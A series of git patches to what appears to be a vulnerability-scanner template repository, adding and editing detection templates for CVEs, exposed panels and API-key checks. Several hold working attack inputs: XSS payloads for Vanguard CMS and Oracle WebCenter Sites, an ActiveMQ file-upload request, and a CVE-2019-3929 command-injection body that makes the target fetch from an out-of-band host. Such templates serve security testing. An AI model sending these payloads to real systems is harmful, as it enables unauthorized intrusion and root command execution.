vulnerabilities/vanguard-post-xss rename to vulnerabilities/other/vanguard-post-xss.yaml index 3f0c14b3fd..29950d20cc 100644 --- a/vulnerabilities/vanguard-post-xss +++ b/vulnerabilities/other/vanguard-post-xss.yaml @@ -1,11 +1,11 @@ id: vanguard-post-xss info: - name: Vanguard Marketplace CMS ≤ 2.1 + name: Vanguard Marketplace CMS ≤ 2.1 author: ImNightmaree severity: medium reference: https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html - tags: vanguard-cms,xss + tags: vanguard,xss requests: - raw: @@ -13,9 +13,9 @@ requests: POST /search HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + phps_query=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3B%3E - + matchers-condition: and matchers: - type: word From 8c5987b2b28ee7a197b21c7d94652988fd094fa3 Mon Sep 17 00:00:00 2001 From: Pradeepch99 Date: Fri, 5 Nov 2021 08:44:19 +0530 Subject: [PATCH 3422/4083] Update CVE-2021-36260.yaml --- cves/2021/CVE-2021-36260.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-36260.yaml b/cves/2021/CVE-2021-36260.yaml index 77c5592d49..04739772fe 100644 --- a/cves/2021/CVE-2021-36260.yaml +++ b/cves/2021/CVE-2021-36260.yaml @@ -37,7 +37,7 @@ requests: matchers: - type: dsl dsl: - - "contains(body_2,'uid=') && contains(body_2,'gid=')" + - "contains(body_2,'uid=') && contains(body_2,'gid=') && contains(body_2,'groups=')" - type: status status: From d41b1537146844ab2a51bb758aad466ab177031c Mon Sep 17 00:00:00 2001 From: yuan <121467570@qq.com> Date: Fri, 5 Nov 2021 14:40:25 +0800 Subject: [PATCH 3423/4083] update fastjson-version extractors --- technologies/fastjson-version.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/technologies/fastjson-version.yaml b/technologies/fastjson-version.yaml index 76a32349e4..ea54b58aca 100644 --- a/technologies/fastjson-version.yaml +++ b/technologies/fastjson-version.yaml @@ -17,8 +17,10 @@ requests: {"@type":"java.lang.AutoCloseable" - matchers: - - type: word + extractors: + - type: regex + name: version part: body - words: - - "fastjson-version" \ No newline at end of file + group: 1 + regex: + - 'fastjson-version.*([0-9]\.[0-9]+\.[0-9]+)' \ No newline at end of file From 1dc2eaa0be9fee07183d09a2f674960ebe62dc2e Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 5 Nov 2021 15:24:58 +0530 Subject: [PATCH 3424/4083] lint fix --- technologies/fastjson-version.yaml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/technologies/fastjson-version.yaml b/technologies/fastjson-version.yaml index ea54b58aca..f6135949d1 100644 --- a/technologies/fastjson-version.yaml +++ b/technologies/fastjson-version.yaml @@ -17,10 +17,14 @@ requests: {"@type":"java.lang.AutoCloseable" - extractors: + matchers: + - type: word + words: + - 'fastjson-version' + + extractors: - type: regex - name: version part: body - group: 1 - regex: + group: 1 + regex: - 'fastjson-version.*([0-9]\.[0-9]+\.[0-9]+)' \ No newline at end of file From 626b97e368b12616d65506f11aab2a9353ee4f22 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 5 Nov 2021 20:58:18 +0530 Subject: [PATCH 3425/4083] Create CVE-2019-3929.yaml --- cves/2019/CVE-2019-3929.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2019/CVE-2019-3929.yaml diff --git a/cves/2019/CVE-2019-3929.yaml b/cves/2019/CVE-2019-3929.yaml new file mode 100644 index 0000000000..e46a5f1bcc --- /dev/null +++ b/cves/2019/CVE-2019-3929.yaml @@ -0,0 +1,28 @@ +id: CVE-2019-3929 + +info: + name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929) + author: _0xf4n9x_ + severity: high + description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. + reference: + - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html + - https://www.exploit-db.com/exploits/46786/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-3929 + tags: rce,cve,cve2019,oob + +requests: + - method: POST + path: + - "{{BaseURL}}/cgi-bin/file_transfer.cgi" + + body: "file_transfer=new&dir=%27Pa_Noteexpr%20wget+http://{{interactsh-url}}Pa_Note%27" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 3c7d23941582f4ba5813a8c18f567c1d14d93735 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 5 Nov 2021 20:59:47 +0530 Subject: [PATCH 3426/4083] Update CVE-2019-3929.yaml --- cves/2019/CVE-2019-3929.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-3929.yaml b/cves/2019/CVE-2019-3929.yaml index e46a5f1bcc..f3cafdeeae 100644 --- a/cves/2019/CVE-2019-3929.yaml +++ b/cves/2019/CVE-2019-3929.yaml @@ -16,7 +16,7 @@ requests: path: - "{{BaseURL}}/cgi-bin/file_transfer.cgi" - body: "file_transfer=new&dir=%27Pa_Noteexpr%20wget+http://{{interactsh-url}}Pa_Note%27" + body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27" headers: Content-Type: application/x-www-form-urlencoded From eef71d5cb8c9758a0d6395da02e978cdcbdc5449 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 5 Nov 2021 21:07:40 +0530 Subject: [PATCH 3427/4083] Update CVE-2019-3929.yaml --- cves/2019/CVE-2019-3929.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-3929.yaml b/cves/2019/CVE-2019-3929.yaml index f3cafdeeae..9312091e78 100644 --- a/cves/2019/CVE-2019-3929.yaml +++ b/cves/2019/CVE-2019-3929.yaml @@ -9,7 +9,7 @@ info: - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html - https://www.exploit-db.com/exploits/46786/ - https://nvd.nist.gov/vuln/detail/CVE-2019-3929 - tags: rce,cve,cve2019,oob + tags: rce,cve,cve2019,oast requests: - method: POST From c7baa0731048eecb6aa1156396732c921f944c4e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 5 Nov 2021 15:44:13 +0000 Subject: [PATCH 3428/4083] Auto Generated CVE annotations [Fri Nov 5 15:44:13 UTC 2021] :robot: --- cves/2019/CVE-2019-3929.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-3929.yaml b/cves/2019/CVE-2019-3929.yaml index 9312091e78..5098a71d3c 100644 --- a/cves/2019/CVE-2019-3929.yaml +++ b/cves/2019/CVE-2019-3929.yaml @@ -3,13 +3,18 @@ id: CVE-2019-3929 info: name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929) author: _0xf4n9x_ - severity: high + severity: critical description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. reference: - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html - https://www.exploit-db.com/exploits/46786/ - https://nvd.nist.gov/vuln/detail/CVE-2019-3929 tags: rce,cve,cve2019,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-3929 + cwe-id: CWE-78 requests: - method: POST From e1cbedaaff2ef04b32b835bd7ec3c9fb4e961daf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 5 Nov 2021 21:29:06 +0530 Subject: [PATCH 3429/4083] Rename CVE-2017-5982.yaml to cves/2017/CVE-2017-5982.yaml --- CVE-2017-5982.yaml => cves/2017/CVE-2017-5982.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename CVE-2017-5982.yaml => cves/2017/CVE-2017-5982.yaml (100%) diff --git a/CVE-2017-5982.yaml b/cves/2017/CVE-2017-5982.yaml similarity index 100% rename from CVE-2017-5982.yaml rename to cves/2017/CVE-2017-5982.yaml From a57cb5081a60bdd2de886d28ba02ee65f3ad0444 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 5 Nov 2021 21:36:53 +0530 Subject: [PATCH 3430/4083] Update vanguard-post-xss.yaml --- vulnerabilities/other/vanguard-post-xss.yaml | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/vanguard-post-xss.yaml b/vulnerabilities/other/vanguard-post-xss.yaml index 29950d20cc..c788fa2b9f 100644 --- a/vulnerabilities/other/vanguard-post-xss.yaml +++ b/vulnerabilities/other/vanguard-post-xss.yaml @@ -4,6 +4,7 @@ info: name: Vanguard Marketplace CMS ≤ 2.1 author: ImNightmaree severity: medium + description: Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box reference: https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html tags: vanguard,xss @@ -14,10 +15,20 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - phps_query=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3B%3E + phps_query=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E matchers-condition: and matchers: - type: word words: - - '' + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 9bae2ef9fd54594a5a6497e016637ccecfb22cf5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 22:37:17 +0530 Subject: [PATCH 3432/4083] Create desktop-ini-leak.yaml --- exposures/files/desktop-ini-leak.yaml | 31 +++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposures/files/desktop-ini-leak.yaml diff --git a/exposures/files/desktop-ini-leak.yaml b/exposures/files/desktop-ini-leak.yaml new file mode 100644 index 0000000000..b075d6dcaf --- /dev/null +++ b/exposures/files/desktop-ini-leak.yaml @@ -0,0 +1,31 @@ +id: desktop-ini-leak + +info: + name: desktop.ini leak + author: dhiyaneshDk + severity: info + tags: exposure,config + metadata: + shodan-query: 'html:"desktop.ini"' + +requests: + - method: GET + path: + - "{{BaseURL}}/desktop.ini" + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: application/octet-stream" + part: header + + - type: word + words: + - "[.ShellClassInfo]" + part: body + condition: and + + - type: status + status: + - 200 From 3724f85254b47598d501ce9d6f3189176cf66448 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Nov 2021 22:47:22 +0530 Subject: [PATCH 3433/4083] Create pentaho-user-console-login.yaml --- .../pentaho-user-console-login.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/pentaho-user-console-login.yaml diff --git a/exposed-panels/pentaho-user-console-login.yaml b/exposed-panels/pentaho-user-console-login.yaml new file mode 100644 index 0000000000..ef30f731a9 --- /dev/null +++ b/exposed-panels/pentaho-user-console-login.yaml @@ -0,0 +1,23 @@ +id: pentaho-user-console-login + +info: + name: Pentaho User Console - Login + author: dhiyaneshDK + severity: info + tags: panel,pentaho + metadata: + shodan-query: 'http.title:"Pentaho User Console - Login"' + +requests: + - method: GET + path: + - '{{BaseURL}}/pentaho/Login' + + matchers-condition: and + matchers: + - type: word + words: + - 'Pentaho User Console - Login' + - type: status + status: + - 200 From fce8f19a97d5130beb8dd1874b56da1965e71842 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Nov 2021 00:03:13 +0530 Subject: [PATCH 3434/4083] Update and rename desktop-ini-leak.yaml to desktop-ini-exposure.yaml --- .../{desktop-ini-leak.yaml => desktop-ini-exposure.yaml} | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename exposures/files/{desktop-ini-leak.yaml => desktop-ini-exposure.yaml} (90%) diff --git a/exposures/files/desktop-ini-leak.yaml b/exposures/files/desktop-ini-exposure.yaml similarity index 90% rename from exposures/files/desktop-ini-leak.yaml rename to exposures/files/desktop-ini-exposure.yaml index b075d6dcaf..518d63a651 100644 --- a/exposures/files/desktop-ini-leak.yaml +++ b/exposures/files/desktop-ini-exposure.yaml @@ -1,17 +1,18 @@ -id: desktop-ini-leak +id: desktop-ini-exposure info: - name: desktop.ini leak + name: desktop.ini exposure author: dhiyaneshDk severity: info - tags: exposure,config metadata: shodan-query: 'html:"desktop.ini"' + tags: exposure,config requests: - method: GET path: - "{{BaseURL}}/desktop.ini" + matchers-condition: and matchers: From 5e1dcfd8a4f1e4397b521bf3b952a3bb58e8b522 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Nov 2021 00:04:04 +0530 Subject: [PATCH 3435/4083] Update and rename pentaho-user-console-login.yaml to pentaho-login.yaml --- .../{pentaho-user-console-login.yaml => pentaho-login.yaml} | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename exposed-panels/{pentaho-user-console-login.yaml => pentaho-login.yaml} (93%) diff --git a/exposed-panels/pentaho-user-console-login.yaml b/exposed-panels/pentaho-login.yaml similarity index 93% rename from exposed-panels/pentaho-user-console-login.yaml rename to exposed-panels/pentaho-login.yaml index ef30f731a9..effc8c6759 100644 --- a/exposed-panels/pentaho-user-console-login.yaml +++ b/exposed-panels/pentaho-login.yaml @@ -1,12 +1,12 @@ -id: pentaho-user-console-login +id: pentaho-login info: name: Pentaho User Console - Login author: dhiyaneshDK severity: info - tags: panel,pentaho metadata: shodan-query: 'http.title:"Pentaho User Console - Login"' + tags: panel,pentaho requests: - method: GET @@ -18,6 +18,7 @@ requests: - type: word words: - 'Pentaho User Console - Login' + - type: status status: - 200 From b66427b7c115e883f704b8cc66630cdc85a2a8d6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Nov 2021 00:06:13 +0530 Subject: [PATCH 3436/4083] Update and rename wp-plugin-ad-widget-lfi.yaml to vulnerabilities/wordpress/ad-widget-lfi.yaml --- .../wordpress/ad-widget-lfi.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) rename wp-plugin-ad-widget-lfi.yaml => vulnerabilities/wordpress/ad-widget-lfi.yaml (96%) diff --git a/wp-plugin-ad-widget-lfi.yaml b/vulnerabilities/wordpress/ad-widget-lfi.yaml similarity index 96% rename from wp-plugin-ad-widget-lfi.yaml rename to vulnerabilities/wordpress/ad-widget-lfi.yaml index c697b2a393..62964352e5 100644 --- a/wp-plugin-ad-widget-lfi.yaml +++ b/vulnerabilities/wordpress/ad-widget-lfi.yaml @@ -1,4 +1,5 @@ -id: wp-plugin-ad-widget-lfi +id: ad-widget-lfi + info: name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0) author: 0x_Akoko From 9cb7fc06386d0c8d51062f3331f3e673bff537e8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Nov 2021 00:10:46 +0530 Subject: [PATCH 3437/4083] Update desktop-ini-exposure.yaml --- exposures/files/desktop-ini-exposure.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/exposures/files/desktop-ini-exposure.yaml b/exposures/files/desktop-ini-exposure.yaml index 518d63a651..0dca63fffb 100644 --- a/exposures/files/desktop-ini-exposure.yaml +++ b/exposures/files/desktop-ini-exposure.yaml @@ -17,15 +17,16 @@ requests: matchers: - type: word - words: - - "Content-Type: application/octet-stream" part: header + words: + - "application/octet-stream" + - "text/plain" + condition: or - type: word + part: body words: - "[.ShellClassInfo]" - part: body - condition: and - type: status status: From f579dba4007d72e93266773a8380c44387723777 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Nov 2021 00:13:08 +0530 Subject: [PATCH 3438/4083] Update desktop-ini-exposure.yaml --- exposures/files/desktop-ini-exposure.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/files/desktop-ini-exposure.yaml b/exposures/files/desktop-ini-exposure.yaml index 0dca63fffb..6a421af051 100644 --- a/exposures/files/desktop-ini-exposure.yaml +++ b/exposures/files/desktop-ini-exposure.yaml @@ -27,6 +27,8 @@ requests: part: body words: - "[.ShellClassInfo]" + - "[LocalizedFileNames]" + condition: or - type: status status: From cd35dc32750b6c70a6ec4b24be9d312f54d44f0c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Nov 2021 00:23:45 +0530 Subject: [PATCH 3439/4083] Update desktop-ini-exposure.yaml --- exposures/files/desktop-ini-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/desktop-ini-exposure.yaml b/exposures/files/desktop-ini-exposure.yaml index 6a421af051..422479b31d 100644 --- a/exposures/files/desktop-ini-exposure.yaml +++ b/exposures/files/desktop-ini-exposure.yaml @@ -12,6 +12,7 @@ requests: - method: GET path: - "{{BaseURL}}/desktop.ini" + - "{{BaseURL}}/Desktop.ini" matchers-condition: and matchers: From a8179317215abbe7acb7d6c34cac52e7a1e74029 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Nov 2021 00:25:04 +0530 Subject: [PATCH 3440/4083] Update desktop-ini-exposure.yaml --- exposures/files/desktop-ini-exposure.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposures/files/desktop-ini-exposure.yaml b/exposures/files/desktop-ini-exposure.yaml index 422479b31d..6a421af051 100644 --- a/exposures/files/desktop-ini-exposure.yaml +++ b/exposures/files/desktop-ini-exposure.yaml @@ -12,7 +12,6 @@ requests: - method: GET path: - "{{BaseURL}}/desktop.ini" - - "{{BaseURL}}/Desktop.ini" matchers-condition: and matchers: From 371d3354b9214355eab3895d43d923720d136115 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Nov 2021 00:42:00 +0530 Subject: [PATCH 3441/4083] Create CVE-2016-3088.yaml --- cves/2016/CVE-2016-3088.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2016/CVE-2016-3088.yaml diff --git a/cves/2016/CVE-2016-3088.yaml b/cves/2016/CVE-2016-3088.yaml new file mode 100644 index 0000000000..8a5735937b --- /dev/null +++ b/cves/2016/CVE-2016-3088.yaml @@ -0,0 +1,34 @@ +id: CVE-2016-3088 + +info: + name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088) + author: fq_hsu + severity: high + description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request. + reference: + - https://www.exploit-db.com/exploits/40857 + - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt + - https://nvd.nist.gov/vuln/detail/CVE-2016-3088 + tags: fileupload,cve,cve2016,apache,activemq + +requests: + - raw: + - | + PUT /fileserver/test.txt HTTP/1.1 + Host: {{Hostname}} + + {{randstr}} + + - raw: + - | + GET /fileserver/test.txt HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_0==204" + - "status_code_1==200" + - "contains((body_1), '{{randstr}}')" + condition: and From 3e12441f6d4aa26617ad522d9bea338633c6ae06 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 6 Nov 2021 03:56:14 +0530 Subject: [PATCH 3442/4083] matcher update --- cves/2021/CVE-2021-36260.yaml | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-36260.yaml b/cves/2021/CVE-2021-36260.yaml index 04739772fe..1cb3defd38 100644 --- a/cves/2021/CVE-2021-36260.yaml +++ b/cves/2021/CVE-2021-36260.yaml @@ -33,15 +33,12 @@ requests: Host: {{Hostname}} req-condition: true - matchers-condition: and matchers: - type: dsl dsl: - - "contains(body_2,'uid=') && contains(body_2,'gid=') && contains(body_2,'groups=')" - - - type: status - status: - - 200 + - "contains(body_2,'uid=') && contains(body_2,'gid=')" + - "status_code_1 == 500 && status_code_2 == 200" + condition: and extractors: - type: regex From 69fc4c04c2fd887c0a010cf11c1e615ff82ad8ec Mon Sep 17 00:00:00 2001 From: Valerio Preti Date: Sat, 6 Nov 2021 00:48:10 +0100 Subject: [PATCH 3443/4083] improve wcs cve-2018-2791 vulnerability check --- cves/2018/CVE-2018-2791.yaml | 31 ++++++++++++++++++++----------- 1 file changed, 20 insertions(+), 11 deletions(-) diff --git a/cves/2018/CVE-2018-2791.yaml b/cves/2018/CVE-2018-2791.yaml index 5dd0c7f892..df8d390be0 100644 --- a/cves/2018/CVE-2018-2791.yaml +++ b/cves/2018/CVE-2018-2791.yaml @@ -1,11 +1,10 @@ id: CVE-2018-2791 info: - name: Oracle WebCenter Sites XSS + name: Oracle WebCenter Sites Multiple XSS author: madrobot severity: high - description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware - tags: cve,cve2018,oracle,xss + description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N cvss-score: 8.20 @@ -15,20 +14,30 @@ info: - http://www.securitytracker.com/id/1040695 - http://www.securityfocus.com/bid/103800 - https://www.exploit-db.com/exploits/44752/ + - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites + tags: cve,cve2018,oracle,xss,webcenter sites,wcs requests: - - method: GET - path: - - "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError" - - matchers-condition: and + - raw: + - | + GET /cs/Satellite?c=qqqq&cid=qqqq&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq"> HTTP/1.1 + Host: {{BaseURL}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + - | + GET /cs/Satellite?destpage="alert(24)' part: body - - type: word words: - "text/html" - part: header \ No newline at end of file + part: header + stop-at-first-match: true \ No newline at end of file From fe5385e93260624832d91b1b22d252fda1a4c2a7 Mon Sep 17 00:00:00 2001 From: Valerio Preti Date: Sat, 6 Nov 2021 00:51:54 +0100 Subject: [PATCH 3444/4083] create check for cve-2018-3238 --- cves/2018/CVE-2018-3238.yaml | 39 ++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2018/CVE-2018-3238.yaml diff --git a/cves/2018/CVE-2018-3238.yaml b/cves/2018/CVE-2018-3238.yaml new file mode 100644 index 0000000000..19ba8b5b7b --- /dev/null +++ b/cves/2018/CVE-2018-3238.yaml @@ -0,0 +1,39 @@ +id: CVE-2018-3238 + +info: + name: Multiple XSS Oracle WebCenter Sites + author: leovalcante + severity: medium + description: Check cve-2018-3238 for Oracle WebCenter Sites. + reference: + - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites + - https://nvd.nist.gov/vuln/detail/CVE-2018-3238 + tags: oracle,webcenter sites,wcs,xss + + +requests: + - raw: + - | + GET /cs/Satellite?c=qqqq&cid=qqqq&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq"> HTTP/1.1 + Host: {{BaseURL}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + - | + GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(24)%3C/script%3E HTTP/1.1 + Host: {{BaseURL}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + - | + GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(24)%3C/script%3E HTTP/1.1 + Host: {{BaseURL}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + matchers: + - type: word + words: + - '' + part: body + stop-at-first-match: true \ No newline at end of file From 41464ac737f5a6b1676f301b6c6631a0aceee7bc Mon Sep 17 00:00:00 2001 From: Valerio Preti Date: Sat, 6 Nov 2021 01:24:41 +0100 Subject: [PATCH 3445/4083] create check for cve-2019-2578 --- cves/2019/CVE-2019-2578.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2019/CVE-2019-2578.yaml diff --git a/cves/2019/CVE-2019-2578.yaml b/cves/2019/CVE-2019-2578.yaml new file mode 100644 index 0000000000..ecd70f5aa0 --- /dev/null +++ b/cves/2019/CVE-2019-2578.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-2578 + +info: + name: Broken Access Control Oracle WebCenter Sites + author: leovalcante + severity: high + description: Check cve-2019-2578 for Oracle WebCenter Sites. + reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites + tags: oracle,webcenter sites,wcs,broken access control + + +requests: + - raw: + - | + GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1 + Host: {{BaseURL}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + - | + GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1 + Host: {{BaseURL}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + redirects: false + matchers: + - type: regex + regex: + - '' + part: body + stop-at-first-match: true \ No newline at end of file From f4ca5c6512272e1a18c0d69cab97a337d902323a Mon Sep 17 00:00:00 2001 From: daffainfo Date: Sat, 6 Nov 2021 11:27:25 +0700 Subject: [PATCH 3446/4083] Add 4 templates token-spray --- token-spray/api-covalent.yaml | 23 +++++++++++++++++++++++ token-spray/api-etherscan.yaml | 23 +++++++++++++++++++++++ token-spray/api-nownodes.yaml | 28 ++++++++++++++++++++++++++++ token-spray/api-thecatapi.yaml | 15 ++++++++++----- token-spray/api-thedogapi.yaml | 27 +++++++++++++++++++++++++++ 5 files changed, 111 insertions(+), 5 deletions(-) create mode 100644 token-spray/api-covalent.yaml create mode 100644 token-spray/api-etherscan.yaml create mode 100644 token-spray/api-nownodes.yaml create mode 100644 token-spray/api-thedogapi.yaml diff --git a/token-spray/api-covalent.yaml b/token-spray/api-covalent.yaml new file mode 100644 index 0000000000..ad6594f1ee --- /dev/null +++ b/token-spray/api-covalent.yaml @@ -0,0 +1,23 @@ +id: api-covalent + +info: + name: Covalent API Test + author: daffainfo + severity: info + reference: + - https://www.covalenthq.com/docs/api/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md + tags: token-spray,covalent + +self-contained: true +requests: + - method: GET + path: + - "https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}" + + matchers: + - type: word + part: body + negative: true + words: + - 'Invalid API key' diff --git a/token-spray/api-etherscan.yaml b/token-spray/api-etherscan.yaml new file mode 100644 index 0000000000..144601dacc --- /dev/null +++ b/token-spray/api-etherscan.yaml @@ -0,0 +1,23 @@ +id: api-etherscan + +info: + name: Etherscan API Test + author: daffainfo + severity: info + reference: + - 